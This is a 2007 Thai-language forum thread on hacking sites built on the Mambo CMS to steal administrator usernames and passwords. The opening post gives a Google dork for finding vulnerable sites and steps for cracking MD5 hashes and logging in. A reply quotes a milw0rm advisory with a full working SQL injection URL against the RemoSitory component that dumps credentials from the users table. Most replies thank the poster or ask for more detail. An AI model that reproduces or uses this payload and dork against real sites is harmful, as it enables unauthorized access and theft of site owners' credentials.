การ hack Mambo เพื่อขโมย username/password

Printable View

24-08-2007, 04:42 PM
tonynuc

ช่องโหว่ใหม่ล่าสุดของ Mambo Component RemoSitory (cat) ที่สามารถดู username/password ของ Mambo ได้

1) วิธีหา host ที่มีช่องโหว่

http://www.google.co.th/search?q=inurl:fu...tart=0&sa=N

2) วิธีการโจมตี

**Hidden Content: To see this hidden content your post count must be 5 or greater.**

TARGET=ชื่อ website ที่มีช่องโหว่

3) ตัวอย่างการโจมตีจริง

**Hidden Content: To see this hidden content your post count must be 5 or greater.**

4) password ที่ได้มาจะถูก hash ด้วย MD5

ให้นำ hash ที่ได้ไปลอง search database ดูได้ที่

http://www.tmto.org/?category=main&page=search_md5

จะได้ password จริงของ admin มา ลองดูเองนะ ว่าได้อะไร (แต่ห้ามไปลองใช้นะ...)

5) วิธีการ Login ถ้าคนเคยใช้ Mambo จะรู้ว่าหน้า Login อยู่ที่ไหน ไม่รู้ลอง google ดู

Have fun
0x90
tonynuc
25-08-2007, 07:24 AM
dexdee_04

ขอวิธีทำอย่างละเอียดหน่อยครับ ยังไม่เข้าใจครับ ยังไงก็ขอบคุณล่วงหน้าและกันครับ
25-08-2007, 02:05 PM
owenx12

อธิบายยังไม่ค่อยระเอียด ขอละเอียดนิดนึงครับ
ยังไงก้อขอบคุณสำหรับสิ่งดีๆ
25-08-2007, 04:30 PM
neo2600

สุดยอดมากๆครับ ขอบคุณมากๆเลย เมื่อนำมาผนวกกับ google ทำให้เราเห็นอะไรเย๊ะมากครับ จะได้ไปหาทางปิดเว็บป๋มก่อน
26-08-2007, 10:40 AM
sodazt

http://TARGET/index.php?option=com_r...%20mos_users/* <<<<ใครเปิดลิ้งค์นี้ได้้ครับ ผมเปิดไม่ได้นะครับ แก้ไขให้ที
26-08-2007, 10:54 AM
kenchiro75

*******************************************************************************
# Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.remository.com/
# $$ : Free
# Dork : inurl:func=selectcat + com_remository // Result:43.400
# DorkEx : http://www.google.com.tr/search?q=inurl:fu...tart=0&sa=N

*******************************************************************************

[<div class='sqltop'>SQL</div><div class='sqlmain'>]]---------------------------------------------------------

http://[target]/[path]///index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=[SQL]

Example:

//index.php?option=com_remository&func=[color=blue;font-weight:bold]select[/color]cat&cat=64549999%20union%20[color=blue;font-weight:bold]select[/color]%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

[ </div>]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]
29-08-2007, 05:34 PM
ruknaja007

ขอบคุณมากๆเลยครับตือว่าพอดีผมกำลังเรียนอยู่พอดีครับ และผมก็กำลังมีปัญหา คือผมลืมพาสเวิดครับ พอดีเห็นกระทุ้นี้ โดนใจเลยครับ
ตอนแรกนึกว่าจะได้ลงใหม่แล้วครับ ขอบคุณมากครับ
29-08-2007, 09:21 PM
nakungza

ขอบคุณครับ มันมีประโยนช์ต่อผมมากครับ ผมจะเรียนรู้ไว้ เพื่อจะเอาไปประยุกค์ใช้ได้นะครับ